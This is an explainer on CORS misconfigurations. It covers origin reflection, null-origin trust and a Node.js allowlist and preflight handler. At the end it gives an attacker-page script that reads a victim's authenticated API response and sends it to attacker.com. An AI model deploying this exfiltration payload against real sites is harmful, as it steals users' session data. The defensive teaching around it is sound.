Cross-Origin Resource Sharing (CORS) is a mechanism that lets a server declare which origins may read its responses, relaxing the Same-Origin Policy in a controlled manner. Note what it does and does not control: the browser usually still sends the cross-origin request (including cookies, if asked to); CORS decides whether the requesting page is allowed to read the response. A misconfigured policy therefore lets an attacker-controlled page read authenticated responses from a victim's session, exposing sensitive data.
When a browser makes a cross-origin request, it adds an Origin header naming the requesting site. The server responds with Access-Control-Allow-* headers specifying what is permitted, and the browser enforces them. For requests that are not "simple" (for example methods such as PUT or DELETE, or custom headers such as Authorization), the browser first sends a preflight OPTIONS request carrying Access-Control-Request-Method and Access-Control-Request-Headers, and only issues the real request if the preflight response allows them.
# Typical restrictive configuration: one explicit origin, fixed method and header lists
Access-Control-Allow-Origin: https://trusted.com
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 86400
# Reflecting the request's Origin header verbatim (very dangerous with credentials: any site can read authenticated responses)
Access-Control-Allow-Origin: [attacker-controlled]
Access-Control-Allow-Credentials: true
# Wildcard with credentials (browsers refuse to expose the response in this combination, so it fails rather than leaks; a wildcard is only appropriate for public, unauthenticated data)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# Trusting the null origin (exploitable: sandboxed iframes, data: URLs and some redirects send Origin: null, so an attacker can produce it at will)
Access-Control-Allow-Origin: null
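Added example, not code from the original page: a Node.js-style CORS decision written two ways, the Origin-reflecting pattern from the list above beside an exact-match allowlist, plus a preflight handler for the OPTIONS flow described earlier. The trusted origins, the method and header lists, and the sample Origin values are assumptions constructed for illustration.

```javascript
// Added example, not code from the original page: a server-side CORS
// decision implemented two ways, the origin-reflecting pattern the page
// warns about and an allowlist that compares the parsed origin exactly.
// Origins, method and header lists below are assumptions for illustration.

const ALLOWED_ORIGINS = new Set([
  'https://trusted.com',
  'https://app.trusted.com',
]);
const ALLOWED_METHODS = ['GET', 'POST', 'PUT'];
const ALLOWED_HEADERS = ['content-type', 'authorization'];

// Vulnerable variant: echo whatever Origin arrives and allow credentials.
// Any site can now read authenticated responses for a logged-in visitor.
function corsHeadersReflect(origin) {
  if (origin === undefined) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened variant: exact-match allowlist on the normalized origin.
function corsHeadersAllowlist(origin, allowed = ALLOWED_ORIGINS) {
  // No Origin header: same-origin navigation or a non-browser client.
  if (origin === undefined) return {};
  // "null" comes from sandboxed iframes, data: URLs and some redirects;
  // it is not a real site identity, so never allow it.
  if (origin === 'null') return {};
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return {}; // malformed Origin: treat as untrusted
  }
  // URL.origin lower-cases the host and drops default ports, so
  // "https://TRUSTED.com:443" equals "https://trusted.com", while
  // "https://trusted.com.attacker.com" and "http://trusted.com" do not.
  const normalized = parsed.origin;
  if (!allowed.has(normalized)) return {};
  return {
    'Access-Control-Allow-Origin': normalized,
    'Access-Control-Allow-Credentials': 'true',
    // Without Vary, a shared cache could serve one origin's answer to another.
    'Vary': 'Origin',
  };
}

// Preflight (OPTIONS) handler: a permissive answer only for an allowed
// origin, and only for listed methods and request headers.
// `headers` is a lower-cased header map, as Node's http module provides.
function handlePreflight(headers) {
  const deny = { status: 403, headers: {} };
  const cors = corsHeadersAllowlist(headers['origin']);
  if (!cors['Access-Control-Allow-Origin']) return deny;
  const method = (headers['access-control-request-method'] || '').toUpperCase();
  if (!ALLOWED_METHODS.includes(method)) return deny;
  const requested = (headers['access-control-request-headers'] || '')
    .split(',')
    .map((h) => h.trim().toLowerCase())
    .filter(Boolean);
  if (!requested.every((h) => ALLOWED_HEADERS.includes(h))) return deny;
  return {
    status: 204,
    headers: {
      ...cors,
      'Access-Control-Allow-Methods': ALLOWED_METHODS.join(', '),
      'Access-Control-Allow-Headers': 'Content-Type, Authorization',
      'Access-Control-Max-Age': '86400',
    },
  };
}

// Constructed sample Origin values a server might see (not real traffic).
const SAMPLE_ORIGINS = [
  'https://trusted.com',
  'https://TRUSTED.com:443',
  'https://trusted.com.attacker.com',
  'https://attacker.com',
  'http://trusted.com',
  'null',
];

// For each sample origin, the ACAO value each variant would emit, to make
// the difference between reflection and an allowlist visible at a glance.
function compareVariants(origins = SAMPLE_ORIGINS) {
  return origins.map((o) => ({
    origin: o,
    reflect: corsHeadersReflect(o)['Access-Control-Allow-Origin'] || '(none)',
    allowlist: corsHeadersAllowlist(o)['Access-Control-Allow-Origin'] || '(none)',
  }));
}

console.table(compareVariants());
```

The allowlist compares the parsed `URL.origin`, not a substring or regular expression, which is what defeats the usual bypasses: a lookalike such as `trusted.com.attacker.com`, a scheme downgrade to `http://`, and the `null` origin. The preflight handler reuses the same decision so that the OPTIONS answer and the real response can never disagree about who is trusted.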
<script>
// Attacker's page. This only works if the API reflects this page's Origin
// (or trusts null) and sets Access-Control-Allow-Credentials: true; the
// victim's session cookie is then sent and the response becomes readable here.
fetch('https://vulnerable-api.com/user/data', {
  credentials: 'include' // attach the victim's cookies to the cross-origin request
})
  .then(r => r.json())
  .then(data => {
    // Exfiltrate the stolen data to the attacker's server; URL-encode it so
    // characters such as & and # in the JSON do not break the query string.
    fetch('https://attacker.com/steal?data=' + encodeURIComponent(JSON.stringify(data)));
  });
</script>